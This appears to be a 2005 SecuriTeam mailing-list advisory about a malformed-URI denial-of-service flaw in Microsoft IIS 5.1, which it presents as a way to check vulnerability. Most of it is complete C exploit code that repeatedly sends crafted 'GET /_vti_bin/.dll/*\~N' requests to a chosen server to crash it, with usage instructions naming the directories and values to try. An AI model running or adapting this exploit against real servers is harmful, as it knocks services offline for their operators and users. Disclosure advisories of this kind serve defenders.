[EXPL] Microsoft IIS Malformed URI DoS (Exploit #2)
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 26 Dec 2005 18:32:21 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Microsoft IIS Malformed URI DoS (Exploit #2)
------------------------------------------------------------------------
SUMMARY
<http://www.microsoft.com/WindowsServer2003/iis/default.mspx> Microsoft
Internet Information Services (IIS) is "a set of Internet-based services
for servers using Microsoft Windows".
Microsoft's IIS 5.1, the version that comes with Windows XP, contains a
security vulnerability in its handing of incoming requests that allows
remote attackers to cause the service to crash by sending it a malformed
request. The following exploit code can be used to determine whether you
are vulnerable to the malformed URI request affecting the IIS or not.
DETAILS
Vulnerable Systems:
* Microsoft Internet Information Server version 5.1
Immune Systems:
* Microsoft Internet Information Server version 5.0
* Microsoft Internet Information Server version 6.0
Exploit:
/*
Name: Microsoft IIS Malformed URI DoS (_vti_bin, _sharepoint) Exploit
File: Microsoft.IIS.Malformed.URI.DoS.(_vti_bin,_sharepoint).cpp
Author: Lympex
Contact:
.- Mail: lympex[at]gmail[dot]com
.- Web: http://l-bytes.tk
Date: 20/12/2005
Info: http://www.securiteam.com/windowsntfocus/6E00E2KEUS.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib,"libws2_32.a")
SOCKET Connect(char *Host, short Port)
{
/*make the socket*/
WSADATA wsaData;
SOCKET Winsock;
/*structs*/
struct sockaddr_in Winsock_In;
struct hostent *Ip;
/*init*/
WSAStartup(MAKEWORD(2,2), &wsaData);
/*asociate*/
Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned
int)NULL,(unsigned int)NULL);
//check the socket
if(Winsock==INVALID_SOCKET)
{
/*exit*/
WSACleanup();
return 1;
}
/*complete the struct*/
Ip=gethostbyname(Host);
Winsock_In.sin_port=htons(Port);
Winsock_In.sin_family=AF_INET;
Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr
*)Ip->h_addr)));
/*connection*/
if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
/*exit*/
WSACleanup();
return 1;
}
return Winsock;
}
/*****************/
/* MAIN FUNCTION */
/*****************/
int main(int argc, char *argv[])
{
printf("\n*******************************************************************");
printf("\n* Microsoft IIS Malformed URI DoS (_vti_bin, _sharepoint)
Exploit *");
printf("\n*-----------------------------------------------------------------*");
printf("\n* Coded by Lympex: lympex[at]gmail[dot]com &&
http://l-bytes.tk *");
printf("\n* Info:
http://www.securiteam.com/windowsntfocus/6E00E2KEUS.html *");
printf("\n*******************************************************************\n");
if(argc!=6)
{
printf("\n[+] Usage: %s <server.com> <port> <directory>
<value> <interval(ms)>",argv[0]);
printf("\n[+] Directories: \x22_vti_bin\x22 /
\x22_sharepoint\x22");
printf("\n (Directory must be set to \x22Scripts &
Executables\x22");
printf("\n[+] Values: ~0, ~1, ~2, ~3, ~4, ~5, ~6, ~7, ~8,
~9\n");
return -1;
}
BOOL Done=FALSE;
unsigned int i;
SOCKET DoS;
char *Request;
printf("\n[+] Doing DoS Attack...");
Request=(char *)malloc((strlen("GET
/")+strlen(argv[3])+strlen(argv[4])+strlen("/.dll/*\\\n\n"))*sizeof(char));
memset(Request,0,sizeof(Request));
//copy the request
strcpy(Request,"GET
/");strcat(Request,argv[3]);strcat(Request,"/.dll/*\\");strcat(Request,argv[4]);strcat(Request,"\n\n");
//make a bucle to do the attack
for(i=0;i<5;i++)
{
DoS=Connect(argv[1],(short)atoi(argv[2]));
//check the socket
if(DoS==1)
{
Done=FALSE;
break;
}
send(DoS,Request,strlen(Request),0);
Sleep(100);
WSACleanup();
//check
if(i==4)
{
Done=TRUE;
}
Sleep((DWORD)atoi(argv[5]));
}
//check again
if(Done==TRUE)
{
printf("DONE");
}else{
printf("ERROR - Server down?");
}
LocalFree(Request);
return 0;
}
/* EoF */
ADDITIONAL INFORMATION
The information has been provided by <mailto:lympex@xxxxxxxxx> Lympex
L-Bytes.Net.
The advisory can be found at:
<http://www.securiteam.com/windowsntfocus/6E00E2KEUS.html>
http://www.securiteam.com/windowsntfocus/6E00E2KEUS.html
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [EXPL] PlanetFileServer DoS (Exploit)
- Next by Date: [NEWS] httprint DoS and Arbitrary Script Injection Vulnerabilities
- Previous by thread: [EXPL] PlanetFileServer DoS (Exploit)
- Next by thread: [NEWS] httprint DoS and Arbitrary Script Injection Vulnerabilities
- Index(es):
Relevant Pages
|
